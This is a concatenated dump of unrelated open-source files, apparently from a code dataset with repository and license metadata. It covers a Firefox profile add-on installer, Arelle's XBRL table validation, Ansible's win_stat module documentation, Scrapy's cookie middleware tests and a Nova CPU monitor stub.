f.write('user_pref("%s", %s);\n' % (key, json.dumps(value))) def _read_existing_userjs(self, userjs): import warnings PREF_RE = re.compile(r'user_pref\("(.*)",\s(.*)\)') try: with open(userjs) as f: for usr in f: matches = re.search(PREF_RE, usr) try: self.default_preferences[matches.group(1)] = json.loads(matches.group(2)) except Exception: warnings.warn("(skipping) failed to json.loads existing preference: " + matches.group(1) + matches.group(2)) except Exception: # The profile given hasn't had any changes made, i.e no users.js pass def _install_extension(self, addon, unpack=True): """ Installs addon from a filepath, url or directory of addons in the profile. - path: url, absolute path to .xpi, or directory of addons - unpack: whether to unpack unless specified otherwise in the install.rdf """ if addon == WEBDRIVER_EXT: addon = os.path.join(os.path.dirname(__file__), WEBDRIVER_EXT) tmpdir = None xpifile = None if addon.endswith('.xpi'): tmpdir = tempfile.mkdtemp(suffix='.' + os.path.split(addon)[-1]) compressed_file = zipfile.ZipFile(addon, 'r') for name in compressed_file.namelist(): if name.endswith('/'): if not os.path.isdir(os.path.join(tmpdir, name)): os.makedirs(os.path.join(tmpdir, name)) else: if not os.path.isdir(os.path.dirname(os.path.join(tmpdir, name))): os.makedirs(os.path.dirname(os.path.join(tmpdir, name))) data = compressed_file.read(name) with open(os.path.join(tmpdir, name), 'wb') as f: f.write(data) xpifile = addon addon = tmpdir # determine the addon id addon_details = self._addon_details(addon) addon_id = addon_details.get('id') assert addon_id, 'The addon id could not be found: %s' % addon # copy the addon to the profile addon_path = os.path.join(self.extensionsDir, addon_id) if not unpack and not addon_details['unpack'] and xpifile: if not os.path.exists(self.extensionsDir): os.makedirs(self.extensionsDir) os.chmod(self.extensionsDir, 0o755) shutil.copy(xpifile, addon_path + '.xpi') else: if not os.path.exists(addon_path): 
shutil.copytree(addon, addon_path, symlinks=True) # remove the temporary directory, if any if tmpdir: shutil.rmtree(tmpdir) def _addon_details(self, addon_path): """ Returns a dictionary of details about the addon. :param addon_path: path to the add-on directory or XPI Returns:: {'id': u'rainbow@colors.org', # id of the addon 'version': u'1.4', # version of the addon 'name': u'Rainbow', # name of the addon 'unpack': False } # whether to unpack the addon """ details = { 'id': None, 'unpack': False, 'name': None, 'version': None } def get_namespace_id(doc, url): attributes = doc.documentElement.attributes namespace = "" for i in range(attributes.length): if attributes.item(i).value == url: if ":" in attributes.item(i).name: # If the namespace is not the default one remove 'xlmns:' namespace = attributes.item(i).name.split(':')[1] + ":" break return namespace def get_text(element): """Retrieve the text value of a given node""" rc = [] for node in element.childNodes: if node.nodeType == node.TEXT_NODE: rc.append(node.data) return ''.join(rc).strip() if not os.path.exists(addon_path): raise IOError('Add-on path does not exist: %s' % addon_path) try: if zipfile.is_zipfile(addon_path): # Bug 944361 - We cannot use 'with' together with zipFile because # it will cause an exception thrown in Python 2.6. 
try: compressed_file = zipfile.ZipFile(addon_path, 'r') manifest = compressed_file.read('install.rdf') finally: compressed_file.close() elif os.path.isdir(addon_path): with open(os.path.join(addon_path, 'install.rdf'), 'r') as f: manifest = f.read() else: raise IOError('Add-on path is neither an XPI nor a directory: %s' % addon_path) except (IOError, KeyError) as e: raise AddonFormatError(str(e), sys.exc_info()[2]) try: doc = minidom.parseString(manifest) # Get the namespaces abbreviations em = get_namespace_id(doc, 'http://www.mozilla.org/2004/em-rdf#') rdf = get_namespace_id(doc, 'http://www.w3.org/1999/02/22-rdf-syntax-ns#') description = doc.getElementsByTagName(rdf + 'Description').item(0) if description is None: description = doc.getElementsByTagName('Description').item(0) for node in description.childNodes: # Remove the namespace prefix from the tag for comparison entry = node.nodeName.replace(em, "") if entry in details.keys(): details.update({entry: get_text(node)}) if details.get('id') is None: for i in range(description.attributes.length): attribute = description.attributes.item(i) if attribute.name == em + 'id': details.update({'id': attribute.value}) except Exception as e: raise AddonFormatError(str(e), sys.exc_info()[2]) # turn unpack into a true/false value if isinstance(details['unpack'], str): details['unpack'] = details['unpack'].lower() == 'true' # If no ID is set, the add-on is invalid if details.get('id') is None: raise AddonFormatError('Add-on id could not be found.') return details
gpl-3.0
acsone/Arelle
arelle/RenderingEvaluator.py
2
16837
''' Created on Jun 6, 2012 @author: Mark V Systems Limited (c) Copyright 2012 Mark V Systems Limited, All rights reserved. ''' from arelle import XPathContext, XbrlConst, XmlUtil from arelle.ModelFormulaObject import (aspectModels, aspectStr, Aspect) from arelle.ModelRenderingObject import (CHILD_ROLLUP_FIRST, CHILD_ROLLUP_LAST, ModelDefinitionNode, ModelEuAxisCoord, ModelBreakdown, ModelClosedDefinitionNode, ModelRuleDefinitionNode, ModelFilterDefinitionNode, ModelDimensionRelationshipDefinitionNode) from arelle.ModelValue import (QName) def init(modelXbrl): # setup modelXbrl for rendering evaluation # dimension defaults required in advance of validation from arelle import ValidateXbrlDimensions, ValidateFormula, FormulaEvaluator, ModelDocument ValidateXbrlDimensions.loadDimensionDefaults(modelXbrl) hasXbrlTables = False # validate table linkbase dimensions for baseSetKey in modelXbrl.baseSets.keys(): arcrole, ELR, linkqname, arcqname = baseSetKey if ELR and linkqname and arcqname and XbrlConst.isTableRenderingArcrole(arcrole): ValidateFormula.checkBaseSet(modelXbrl, arcrole, ELR, modelXbrl.relationshipSet(arcrole,ELR,linkqname,arcqname)) if arcrole in (XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, XbrlConst.tableBreakdown201301, XbrlConst.tableAxis2011): hasXbrlTables = True # provide context for view if modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE: instance = None # use instance of the entry pont else: # need dummy instance instance = ModelDocument.create(modelXbrl, ModelDocument.Type.INSTANCE, "dummy.xml", # fake URI and fake schemaRef ("http://www.xbrl.org/2003/xbrl-instance-2003-12-31.xsd",)) if hasXbrlTables: # formula processor is needed for 2011 XBRL tables but not for 2010 Eurofiling tables FormulaEvaluator.init() modelXbrl.rendrCntx = XPathContext.create(modelXbrl, instance) modelXbrl.profileStat(None) # setup fresh parameters from formula options modelXbrl.parameters = 
modelXbrl.modelManager.formulaOptions.typedParameters(modelXbrl.prefixedNamespaces) # validate parameters and custom function signatures ValidateFormula.validate(modelXbrl, xpathContext=modelXbrl.rendrCntx, parametersOnly=True, statusMsg=_("compiling rendering tables")) # deprecated as of 2013-05-17 # check and extract message expressions into compilable programs for msgArcrole in (XbrlConst.tableDefinitionNodeMessage201301, XbrlConst.tableDefinitionNodeSelectionMessage201301, XbrlConst.tableAxisMessage2011, XbrlConst.tableAxisSelectionMessage2011): for msgRel in modelXbrl.relationshipSet(msgArcrole).modelRelationships: ValidateFormula.checkMessageExpressions(modelXbrl, msgRel.toModelObject) # compile and validate tables for modelTable in modelXbrl.modelRenderingTables: modelTable.fromInstanceQnames = None # required if referred to by variables scope chaining modelTable.compile() hasNsWithAspectModel = modelTable.namespaceURI in (XbrlConst.euRend, XbrlConst.table2011, XbrlConst.table201301, XbrlConst.table201305) # check aspectModel (attribute removed 2013-06, now always dimensional) if modelTable.aspectModel not in ("non-dimensional", "dimensional") and hasNsWithAspectModel: modelXbrl.error("xbrlte:unknownAspectModel", _("Table %(xlinkLabel)s, aspect model %(aspectModel)s not recognized"), modelObject=modelTable, xlinkLabel=modelTable.xlinkLabel, aspectModel=modelTable.aspectModel) else: modelTable.priorAspectAxisDisposition = {} # check ordinate aspects against aspectModel oppositeAspectModel = (_DICT_SET({'dimensional','non-dimensional'}) - _DICT_SET({modelTable.aspectModel})).pop() if hasNsWithAspectModel: uncoverableAspects = aspectModels[oppositeAspectModel] - aspectModels[modelTable.aspectModel] else: uncoverableAspects = () aspectsCovered = set() for tblAxisRel in modelXbrl.relationshipSet((XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, 
XbrlConst.tableBreakdown201301,XbrlConst.tableAxis2011)).fromModelObject(modelTable): breakdownAspectsCovered = set() hasCoveredAspect = checkBreakdownDefinitionNode(modelXbrl, modelTable, tblAxisRel, tblAxisRel.axisDisposition, uncoverableAspects, breakdownAspectsCovered) ''' removed 2013-10 if not hasCoveredAspect: definitionNode = tblAxisRel.toModelObject modelXbrl.error("xbrlte:breakdownDefinesNoAspects", _("Breakdown %(xlinkLabel)s has no participating aspects"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, axis=definitionNode.localName) ''' aspectsCovered |= breakdownAspectsCovered checkBreakdownLeafNodeAspects(modelXbrl, modelTable, tblAxisRel, set(), breakdownAspectsCovered) if Aspect.CONCEPT not in aspectsCovered and not hasNsWithAspectModel: modelXbrl.error("xbrlte:tableMissingConceptAspect", _("Table %(xlinkLabel)s does not include the concept aspect as one of its participating aspects"), modelObject=modelTable, xlinkLabel=modelTable.xlinkLabel) del modelTable.priorAspectAxisDisposition # check for table-parameter name clash parameterNames = {} for tblParamRel in modelXbrl.relationshipSet((XbrlConst.tableParameter, XbrlConst.tableParameterMMDD)).fromModelObject(modelTable): parameterName = tblParamRel.variableQname if parameterName in parameterNames: modelXbrl.error("xbrlte:tableParameterNameClash ", _("Table %(xlinkLabel)s has parameter name clash for variable %(name)s"), modelObject=(modelTable,tblParamRel,parameterNames[parameterName]), xlinkLabel=modelTable.xlinkLabel, name=parameterName) else: parameterNames[parameterName] = tblParamRel modelXbrl.profileStat(_("compileTables")) def checkBreakdownDefinitionNode(modelXbrl, modelTable, tblAxisRel, tblAxisDisposition, uncoverableAspects, aspectsCovered): definitionNode = tblAxisRel.toModelObject hasCoveredAspect = False if isinstance(definitionNode, (ModelDefinitionNode, ModelEuAxisCoord)): for aspect in definitionNode.aspectsCovered(): aspectsCovered.add(aspect) if 
(aspect in uncoverableAspects or (isinstance(aspect, QName) and modelTable.aspectModel == 'non-dimensional')): modelXbrl.error("xbrlte:axisAspectModelMismatch", _("%(definitionNode)s %(xlinkLabel)s, aspect model %(aspectModel)s, aspect %(aspect)s not allowed"), modelObject=modelTable, definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, aspectModel=modelTable.aspectModel, aspect=str(aspect) if isinstance(aspect,QName) else Aspect.label[aspect]) hasCoveredAspect = True if aspect in modelTable.priorAspectAxisDisposition: otherAxisDisposition, otherDefinitionNode = modelTable.priorAspectAxisDisposition[aspect] if tblAxisDisposition != otherAxisDisposition and aspect != Aspect.DIMENSIONS: modelXbrl.error("xbrlte:aspectClashBetweenBreakdowns", _("%(definitionNode)s %(xlinkLabel)s, aspect %(aspect)s defined on axes of disposition %(axisDisposition)s and %(axisDisposition2)s"), modelObject=(modelTable, definitionNode, otherDefinitionNode), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, axisDisposition=tblAxisDisposition, axisDisposition2=otherAxisDisposition, aspect=str(aspect) if isinstance(aspect,QName) else Aspect.label[aspect]) else: modelTable.priorAspectAxisDisposition[aspect] = (tblAxisDisposition, definitionNode) ruleSetChildren = XmlUtil.children(definitionNode, definitionNode.namespaceURI, "ruleSet") if definitionNode.isMerged: if ruleSetChildren: modelXbrl.error("xbrlte:mergedRuleNodeWithTaggedRuleSet", _("Merged %(definitionNode)s %(xlinkLabel)s has tagged rule set(s)"), modelObject=[modelTable, definitionNode] + ruleSetChildren, definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel) labelRels = modelXbrl.relationshipSet(XbrlConst.elementLabel).fromModelObject(definitionNode) if labelRels: modelXbrl.error("xbrlte:invalidUseOfLabel", _("Merged %(definitionNode)s %(xlinkLabel)s has label(s)"), modelObject=[modelTable, definitionNode] + [r.toModelObject for r in labelRels], 
definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel) if not definitionNode.isAbstract: modelXbrl.error("xbrlte:nonAbstractMergedRuleNode", _("Merged %(definitionNode)s %(xlinkLabel)s is not abstract"), modelObject=(modelTable, definitionNode), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel) if isinstance(definitionNode, ModelRuleDefinitionNode): tagConstraintSets = {} otherConstraintSet = None # must look at xml constructs for duplicates for ruleSet in XmlUtil.children(definitionNode, definitionNode.namespaceURI, "ruleSet"): tag = ruleSet.tagName if tag is not None: # named constraint sets only for aspect in ruleSet.aspectsCovered(): if aspect != Aspect.DIMENSIONS: modelTable.aspectsInTaggedConstraintSets.add(aspect) if tag in tagConstraintSets: modelXbrl.error("xbrlte:duplicateTag", _("%(definitionNode)s %(xlinkLabel)s duplicate rule set tags %(tag)s"), modelObject=(modelTable, definitionNode, tagConstraintSets[tag], ruleSet), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, tag=tag) else: tagConstraintSets[tag] = ruleSet for tag, constraintSet in definitionNode.constraintSets.items(): if otherConstraintSet is None: otherConstraintSet = constraintSet elif otherConstraintSet.aspectsCovered() != constraintSet.aspectsCovered(): modelXbrl.error("xbrlte:constraintSetAspectMismatch", _("%(definitionNode)s %(xlinkLabel)s constraint set mismatches between %(tag1)s and %(tag2)s in constraints %(aspects)s"), modelObject=(modelTable, definitionNode, otherConstraintSet, constraintSet), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, tag1=getattr(otherConstraintSet,"tagName","(no tag)"), tag2=getattr(constraintSet, "tagName", "(no tag)"), aspects=", ".join(aspectStr(aspect) for aspect in otherConstraintSet.aspectsCovered() ^ constraintSet.aspectsCovered() if aspect != Aspect.DIMENSIONS)) if isinstance(definitionNode, ModelDimensionRelationshipDefinitionNode): 
hasCoveredAspect = True if modelTable.aspectModel == 'non-dimensional': modelXbrl.error("xbrlte:axisAspectModelMismatch", _("DimensionRelationship axis %(xlinkLabel)s can't be used in non-dimensional aspect model"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel) definitionNodeHasChild = False for axisSubtreeRel in modelXbrl.relationshipSet((XbrlConst.tableBreakdownTree, XbrlConst.tableBreakdownTreeMMDD, XbrlConst.tableBreakdownTree201305, XbrlConst.tableDefinitionNodeSubtree, XbrlConst.tableDefinitionNodeSubtreeMMDD, XbrlConst.tableDefinitionNodeSubtree201305, XbrlConst.tableDefinitionNodeSubtree201301, XbrlConst.tableAxisSubtree2011)).fromModelObject(definitionNode): if checkBreakdownDefinitionNode(modelXbrl, modelTable, axisSubtreeRel, tblAxisDisposition, uncoverableAspects, aspectsCovered): hasCoveredAspect = True # something below was covering definitionNodeHasChild = True if isinstance(definitionNode, ModelFilterDefinitionNode): for aspect in definitionNode.aspectsCovered(): if isinstance(aspect, QName): # dimension aspect concept = modelXbrl.qnameConcepts.get(aspect) if concept is None or not concept.isDimensionItem: modelXbrl.error("xbrlte:invalidDimensionQNameOnAspectNode", _("Aspect node %(xlinkLabel)s dimensional aspect %(dimension)s is not a dimension"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, dimension=aspect) if not definitionNodeHasChild: if (definitionNode.namespaceURI in ("http://www.eurofiling.info/2010/rendering", "http://xbrl.org/2011/table") and not hasCoveredAspect): modelXbrl.error("xbrlte:aspectValueNotDefinedByOrdinate", _("%(definitionNode)s %(xlinkLabel)s does not define an aspect"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, definitionNode=definitionNode.localName) if (isinstance(definitionNode, ModelClosedDefinitionNode) and definitionNode.isAbstract): modelXbrl.error("xbrlte:abstractRuleNodeNoChildren", _("Abstract 
%(definitionNode)s %(xlinkLabel)s has no children"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, definitionNode=definitionNode.localName) return hasCoveredAspect def checkBreakdownLeafNodeAspects(modelXbrl, modelTable, tblAxisRel, parentAspectsCovered, breakdownAspects): definitionNode = tblAxisRel.toModelObject aspectsCovered = parentAspectsCovered.copy() if isinstance(definitionNode, (ModelDefinitionNode, ModelEuAxisCoord)): for aspect in definitionNode.aspectsCovered(): aspectsCovered.add(aspect) definitionNodeHasChild = False for axisSubtreeRel in modelXbrl.relationshipSet((XbrlConst.tableBreakdownTree, XbrlConst.tableBreakdownTreeMMDD, XbrlConst.tableBreakdownTree201305, XbrlConst.tableDefinitionNodeSubtree, XbrlConst.tableDefinitionNodeSubtreeMMDD, XbrlConst.tableDefinitionNodeSubtree201305, XbrlConst.tableDefinitionNodeSubtree201301, XbrlConst.tableAxisSubtree2011)).fromModelObject(definitionNode): checkBreakdownLeafNodeAspects(modelXbrl, modelTable, axisSubtreeRel, aspectsCovered, breakdownAspects) definitionNodeHasChild = True if not definitionNode.isAbstract and not isinstance(definitionNode, ModelBreakdown): # this is a leaf node missingAspects = set(aspect for aspect in breakdownAspects if aspect not in aspectsCovered and aspect != Aspect.DIMENSIONS and not isinstance(aspect,QName)) if (missingAspects): modelXbrl.error("xbrlte:missingAspectValue", _("%(definitionNode)s %(xlinkLabel)s does not define an aspect for %(aspect)s"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, definitionNode=definitionNode.localName, aspect=', '.join(aspectStr(aspect) for aspect in missingAspects))
apache-2.0
SteveHNH/ansible
lib/ansible/modules/windows/win_stat.py
26
7647
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub, actual code lives in the .ps1 # file of the same name ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'core'} DOCUMENTATION = r''' --- module: win_stat version_added: "1.7" short_description: returns information about a Windows file description: - Returns information about a Windows file. - For non-Windows targets, use the M(stat) module instead. options: path: description: - The full path of the file/object to get the facts of; both forward and back slashes are accepted. required: yes get_md5: description: - Whether to return the checksum sum of the file. Between Ansible 1.9 and 2.2 this is no longer an MD5, but a SHA1 instead. As of Ansible 2.3 this is back to an MD5. Will return None if host is unable to use specified algorithm. - This option is deprecated in Ansible 2.3 and is replaced with C(checksum_algorithm=md5). required: no default: True get_checksum: description: - Whether to return a checksum of the file (default sha1) required: no default: True version_added: "2.1" checksum_algorithm: description: - Algorithm to determine checksum of file. Will throw an error if the host is unable to use specified algorithm. 
required: no default: sha1 choices: ['md5', 'sha1', 'sha256', 'sha384', 'sha512'] version_added: "2.3" notes: - For non-Windows targets, use the M(stat) module instead. author: "Chris Church (@cchurch)" ''' EXAMPLES = r''' - name: Obtain information about a file win_stat: path: C:\foo.ini register: file_info # Obtain information about a folder - win_stat: path: C:\bar register: folder_info # Get MD5 checksum of a file - win_stat: path: C:\foo.ini get_checksum: yes checksum_algorithm: md5 register: md5_checksum - debug: var: md5_checksum.stat.checksum # Get SHA1 checksum of file - win_stat: path: C:\foo.ini get_checksum: yes register: sha1_checksum - debug: var: sha1_checksum.stat.checksum # Get SHA256 checksum of file - win_stat: path: C:\foo.ini get_checksum: yes checksum_algorithm: sha256 register: sha256_checksum - debug: var: sha256_checksum.stat.checksum ''' RETURN = r''' changed: description: Whether anything was changed returned: always type: boolean sample: True stat: description: dictionary containing all the stat data returned: success type: complex contains: attributes: description: attributes of the file at path in raw form returned: success, path exists type: string sample: "Archive, Hidden" checksum: description: The checksum of a file based on checksum_algorithm specified returned: success, path exist, path is a file, get_checksum == True checksum_algorithm specified is supported type: string sample: 09cb79e8fc7453c84a07f644e441fd81623b7f98 creationtime: description: the create time of the file represented in seconds since epoch returned: success, path exists type: float sample: 1477984205.15 exists: description: if the path exists or not returned: success type: boolean sample: True extension: description: the extension of the file at path returned: success, path exists, path is a file type: string sample: ".ps1" filename: description: the name of the file (without path) returned: success, path exists, path is a file type: string sammple: foo.ini 
isarchive: description: if the path is ready for archiving or not returned: success, path exists type: boolean sample: True isdir: description: if the path is a directory or not returned: success, path exists type: boolean sample: True ishidden: description: if the path is hidden or not returned: success, path exists type: boolean sample: True islnk: description: if the path is a symbolic link or junction or not returned: success, path exists type: boolean sample: True isreadonly: description: if the path is read only or not returned: success, path exists type: boolean sample: True isreg: description: if the path is a regular file returned: success, path exists type: boolean sample: True isshared: description: if the path is shared or not returned: success, path exists type: boolean sample: True lastaccesstime: description: the last access time of the file represented in seconds since epoch returned: success, path exists type: float sample: 1477984205.15 lastwritetime: description: the last modification time of the file represented in seconds since epoch returned: success, path exists type: float sample: 1477984205.15 lnk_source: description: the target of the symbolic link, will return null if not a link or the link is broken return: success, path exists, file is a symbolic link type: string sample: C:\temp md5: description: The MD5 checksum of a file (Between Ansible 1.9 and 2.2 this was returned as a SHA1 hash) returned: success, path exist, path is a file, get_md5 == True, md5 is supported type: string sample: 09cb79e8fc7453c84a07f644e441fd81623b7f98 owner: description: the owner of the file returned: success, path exists type: string sample: BUILTIN\Administrators path: description: the full absolute path to the file returned: success, path exists, file exists type: string sample: C:\foo.ini sharename: description: the name of share if folder is shared returned: success, path exists, file is a directory and isshared == True type: string sample: file-share 
size: description: the size in bytes of a file or folder returned: success, path exists, file is not a link type: int sample: 1024 '''
gpl-3.0
moraesnicol/scrapy
tests/test_downloadermiddleware_cookies.py
116
10382
import re import logging from unittest import TestCase from testfixtures import LogCapture from scrapy.http import Response, Request from scrapy.spiders import Spider from scrapy.utils.test import get_crawler from scrapy.exceptions import NotConfigured from scrapy.downloadermiddlewares.cookies import CookiesMiddleware class CookiesMiddlewareTest(TestCase): def assertCookieValEqual(self, first, second, msg=None): cookievaleq = lambda cv: re.split(';\s*', cv.decode('latin1')) return self.assertEqual( sorted(cookievaleq(first)), sorted(cookievaleq(second)), msg) def setUp(self): self.spider = Spider('foo') self.mw = CookiesMiddleware() def tearDown(self): del self.mw def test_basic(self): req = Request('http://scrapytest.org/') assert self.mw.process_request(req, self.spider) is None assert 'Cookie' not in req.headers headers = {'Set-Cookie': 'C1=value1; path=/'} res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/sub1/') assert self.mw.process_request(req2, self.spider) is None self.assertEquals(req2.headers.get('Cookie'), b"C1=value1") def test_setting_false_cookies_enabled(self): self.assertRaises( NotConfigured, CookiesMiddleware.from_crawler, get_crawler(settings_dict={'COOKIES_ENABLED': False}) ) def test_setting_default_cookies_enabled(self): self.assertIsInstance( CookiesMiddleware.from_crawler(get_crawler()), CookiesMiddleware ) def test_setting_true_cookies_enabled(self): self.assertIsInstance( CookiesMiddleware.from_crawler( get_crawler(settings_dict={'COOKIES_ENABLED': True}) ), CookiesMiddleware ) def test_setting_enabled_cookies_debug(self): crawler = get_crawler(settings_dict={'COOKIES_DEBUG': True}) mw = CookiesMiddleware.from_crawler(crawler) with LogCapture('scrapy.downloadermiddlewares.cookies', propagate=False, level=logging.DEBUG) as l: req = Request('http://scrapytest.org/') res = Response('http://scrapytest.org/', headers={'Set-Cookie': 
'C1=value1; path=/'}) mw.process_response(req, res, crawler.spider) req2 = Request('http://scrapytest.org/sub1/') mw.process_request(req2, crawler.spider) l.check( ('scrapy.downloadermiddlewares.cookies', 'DEBUG', 'Received cookies from: <200 http://scrapytest.org/>\n' 'Set-Cookie: C1=value1; path=/\n'), ('scrapy.downloadermiddlewares.cookies', 'DEBUG', 'Sending cookies to: <GET http://scrapytest.org/sub1/>\n' 'Cookie: C1=value1\n'), ) def test_setting_disabled_cookies_debug(self): crawler = get_crawler(settings_dict={'COOKIES_DEBUG': False}) mw = CookiesMiddleware.from_crawler(crawler) with LogCapture('scrapy.downloadermiddlewares.cookies', propagate=False, level=logging.DEBUG) as l: req = Request('http://scrapytest.org/') res = Response('http://scrapytest.org/', headers={'Set-Cookie': 'C1=value1; path=/'}) mw.process_response(req, res, crawler.spider) req2 = Request('http://scrapytest.org/sub1/') mw.process_request(req2, crawler.spider) l.check() def test_do_not_break_on_non_utf8_header(self): req = Request('http://scrapytest.org/') assert self.mw.process_request(req, self.spider) is None assert 'Cookie' not in req.headers headers = {'Set-Cookie': b'C1=in\xa3valid; path=/', 'Other': b'ignore\xa3me'} res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/sub1/') assert self.mw.process_request(req2, self.spider) is None self.assertIn('Cookie', req2.headers) def test_dont_merge_cookies(self): # merge some cookies into jar headers = {'Set-Cookie': 'C1=value1; path=/'} req = Request('http://scrapytest.org/') res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res # test Cookie header is not seted to request req = Request('http://scrapytest.org/dontmerge', meta={'dont_merge_cookies': 1}) assert self.mw.process_request(req, self.spider) is None assert 'Cookie' not in req.headers # check that returned 
cookies are not merged back to jar res = Response('http://scrapytest.org/dontmerge', headers={'Set-Cookie': 'dont=mergeme; path=/'}) assert self.mw.process_response(req, res, self.spider) is res # check that cookies are merged back req = Request('http://scrapytest.org/mergeme') assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'C1=value1') # check that cookies are merged when dont_merge_cookies is passed as 0 req = Request('http://scrapytest.org/mergeme', meta={'dont_merge_cookies': 0}) assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'C1=value1') def test_complex_cookies(self): # merge some cookies into jar cookies = [{'name': 'C1', 'value': 'value1', 'path': '/foo', 'domain': 'scrapytest.org'}, {'name': 'C2', 'value': 'value2', 'path': '/bar', 'domain': 'scrapytest.org'}, {'name': 'C3', 'value': 'value3', 'path': '/foo', 'domain': 'scrapytest.org'}, {'name': 'C4', 'value': 'value4', 'path': '/foo', 'domain': 'scrapy.org'}] req = Request('http://scrapytest.org/', cookies=cookies) self.mw.process_request(req, self.spider) # embed C1 and C3 for scrapytest.org/foo req = Request('http://scrapytest.org/foo') self.mw.process_request(req, self.spider) assert req.headers.get('Cookie') in (b'C1=value1; C3=value3', b'C3=value3; C1=value1') # embed C2 for scrapytest.org/bar req = Request('http://scrapytest.org/bar') self.mw.process_request(req, self.spider) self.assertEquals(req.headers.get('Cookie'), b'C2=value2') # embed nothing for scrapytest.org/baz req = Request('http://scrapytest.org/baz') self.mw.process_request(req, self.spider) assert 'Cookie' not in req.headers def test_merge_request_cookies(self): req = Request('http://scrapytest.org/', cookies={'galleta': 'salada'}) assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'galleta=salada') headers = {'Set-Cookie': 'C1=value1; path=/'} res = 
Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/sub1/') assert self.mw.process_request(req2, self.spider) is None self.assertCookieValEqual(req2.headers.get('Cookie'), b"C1=value1; galleta=salada") def test_cookiejar_key(self): req = Request('http://scrapytest.org/', cookies={'galleta': 'salada'}, meta={'cookiejar': "store1"}) assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'galleta=salada') headers = {'Set-Cookie': 'C1=value1; path=/'} res = Response('http://scrapytest.org/', headers=headers, request=req) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/', meta=res.meta) assert self.mw.process_request(req2, self.spider) is None self.assertCookieValEqual(req2.headers.get('Cookie'), b'C1=value1; galleta=salada') req3 = Request('http://scrapytest.org/', cookies={'galleta': 'dulce'}, meta={'cookiejar': "store2"}) assert self.mw.process_request(req3, self.spider) is None self.assertEquals(req3.headers.get('Cookie'), b'galleta=dulce') headers = {'Set-Cookie': 'C2=value2; path=/'} res2 = Response('http://scrapytest.org/', headers=headers, request=req3) assert self.mw.process_response(req3, res2, self.spider) is res2 req4 = Request('http://scrapytest.org/', meta=res2.meta) assert self.mw.process_request(req4, self.spider) is None self.assertCookieValEqual(req4.headers.get('Cookie'), b'C2=value2; galleta=dulce') #cookies from hosts with port req5_1 = Request('http://scrapytest.org:1104/') assert self.mw.process_request(req5_1, self.spider) is None headers = {'Set-Cookie': 'C1=value1; path=/'} res5_1 = Response('http://scrapytest.org:1104/', headers=headers, request=req5_1) assert self.mw.process_response(req5_1, res5_1, self.spider) is res5_1 req5_2 = Request('http://scrapytest.org:1104/some-redirected-path') assert self.mw.process_request(req5_2, self.spider) is 
None self.assertEquals(req5_2.headers.get('Cookie'), b'C1=value1') req5_3 = Request('http://scrapytest.org/some-redirected-path') assert self.mw.process_request(req5_3, self.spider) is None self.assertEquals(req5_3.headers.get('Cookie'), b'C1=value1') #skip cookie retrieval for not http request req6 = Request('file:///scrapy/sometempfile') assert self.mw.process_request(req6, self.spider) is None self.assertEquals(req6.headers.get('Cookie'), None) def test_local_domain(self): request = Request("http://example-host/", cookies={'currencyCookie': 'USD'}) assert self.mw.process_request(request, self.spider) is None self.assertIn('Cookie', request.headers) self.assertEqual(b'currencyCookie=USD', request.headers['Cookie'])
bsd-3-clause
sajeeshcs/nested_quota_final
nova/compute/monitors/cpu_monitor.py
63
2132
# Copyright 2013 Intel Corporation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ CPU monitor to retrieve CPU information """ from nova.compute import monitors class _CPUMonitorBase(monitors.ResourceMonitorBase): """CPU monitor base.""" def _get_cpu_frequency(self, **kwargs): """Return CPU current frequency and its timestamp.""" return None, None def _get_cpu_user_time(self, **kwargs): """Return CPU user mode time and its timestamp.""" return None, None def _get_cpu_kernel_time(self, **kwargs): """Return CPU kernel time and its timestamp.""" return None, None def _get_cpu_idle_time(self, **kwargs): """Return CPU idle time and its timestamp.""" return None, None 